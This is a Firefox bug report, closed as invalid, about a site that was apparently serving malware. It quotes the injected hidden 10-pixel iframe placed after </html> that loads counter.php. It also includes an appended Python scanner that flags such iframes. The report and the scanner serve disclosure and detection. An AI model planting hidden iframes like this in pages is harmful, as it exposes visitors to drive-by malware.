firefox 12.0 got hacked. i visited site, site had weird code, installed software

RESOLVED INVALID

Status

Firefox
Untriaged
RESOLVED INVALID
5 years ago
5 years ago

People

(Reporter: nathan, Unassigned)

Tracking

12 Branch
x86
Windows 7
Firefox Tracking Flags

(Not tracked)

Details

(Reporter)

Description

5 years ago
User Agent: Mozilla/5.0 (Windows NT 6.1; rv:12.0) Gecko/20100101 Firefox/12.0
Build ID: 20120420145725

Steps to reproduce:

visited : http://proxyrental.net/

they have some weird code on the very bottom of the site.. that loads an iframe called counter.php.. this code doesn't seem legit. I have found a hack reference to this counter.php

http://forums.whirlpool.net.au/archive/1924864

This would be this hack is pretty serious, no? All users.... someone is probably mass hacking now


Actual results:

visited : http://proxyrental.net/

they have some weird code on the very bottom of the site.. that loads an iframe called counter.php.. this code doesn't seem legit. I have found a hack reference to this counter.php

http://forums.whirlpool.net.au/archive/1924864

This would be this hack is pretty serious, no? All users.... someone is probably mass hacking now


Expected results:

visited : http://proxyrental.net/

they have some weird code on the very bottom of the site.. that loads an iframe called counter.php.. this code doesn't seem legit. I have found a hack reference to this counter.php

http://forums.whirlpool.net.au/archive/1924864

This would be this hack is pretty serious, no? All users.... someone is probably mass hacking now

</html><iframe src="http://proxyrental.net/counter.php" style="visibility: hidden; position: absolute; left: 0px; top: 0px" width="10" height="10"/>

Is the code in question - I don't see an attack vector here. Removing the security flag.
Group: core-security
(Reporter)

Comment 2

5 years ago
> Is the code in question - I don't see an attack vector here.

It is an attack vector. The link I posted shows that code is the implementation of a mass hack. Note iframe is installed below /html

counter.php code is loading browser detecting exploit code of some kind of I would suspect. It installed a trojan somehow

This is not a Firefox bug. All kinds of sites get infected with malware all of the time. There is nothing for us to do here unless you have a pointer to a way that code is being installed into/through Firefox without you doing anything.
Status: UNCONFIRMED → RESOLVED
Last Resolved: 5 years ago
Resolution: --- → INVALID
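
For a site owner or responder checking pages for the markup quoted in this bug, the following is an added example (not part of the bug report and not Mozilla code): a Python scan that flags an iframe placed after </html>, hidden by inline style, or sized 10px or less. The names audit and IframeAudit, the 10px threshold and the sample page are assumptions made for illustration.

```python
import re
from html.parser import HTMLParser
# Inline styles that hide an element from the visitor.
HIDDEN_STYLE = re.compile(r"visibility\s*:\s*hidden|display\s*:\s*none", re.I)
TINY_PX = 10  # assumption: a frame this small is not meant to be seen


def _px(value):  # width/height attribute as int, or None if not numeric
    m = re.match(r"\s*(\d+)", value or "")
    return int(m.group(1)) if m else None


class IframeAudit(HTMLParser):
    """Records each <iframe> together with the reasons it looks injected."""
    def __init__(self):
        super().__init__()
        self.html_closed = False  # becomes True once </html> has been seen
        self.findings = []

    def handle_endtag(self, tag):
        if tag == "html":
            self.html_closed = True

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":
            return
        a = {k: (v or "") for k, v in attrs}
        reasons = []
        if self.html_closed:  # markup appended after the document ended
            reasons.append("after-</html>")
        if HIDDEN_STYLE.search(a.get("style", "")):
            reasons.append("hidden-style")
        if any(d is not None and d <= TINY_PX
               for d in (_px(a.get("width")), _px(a.get("height")))):
            reasons.append("tiny")
        if reasons:
            self.findings.append({"src": a.get("src", ""), "reasons": reasons})


def audit(html_text):
    parser = IframeAudit()
    parser.feed(html_text)
    parser.close()
    return parser.findings

# Constructed sample: an ordinary page followed by the iframe quoted in this bug.
SAMPLE = """<html><body>
<iframe src="https://example.com/video" width="560" height="315"></iframe>
</body>
</html><iframe src="http://proxyrental.net/counter.php" style="visibility: hidden; position: absolute; left: 0px; top: 0px" width="10" height="10"/>
"""
```

Calling audit(SAMPLE) returns one finding, for the counter.php frame, with all three reasons; the visible 560x315 frame is not reported.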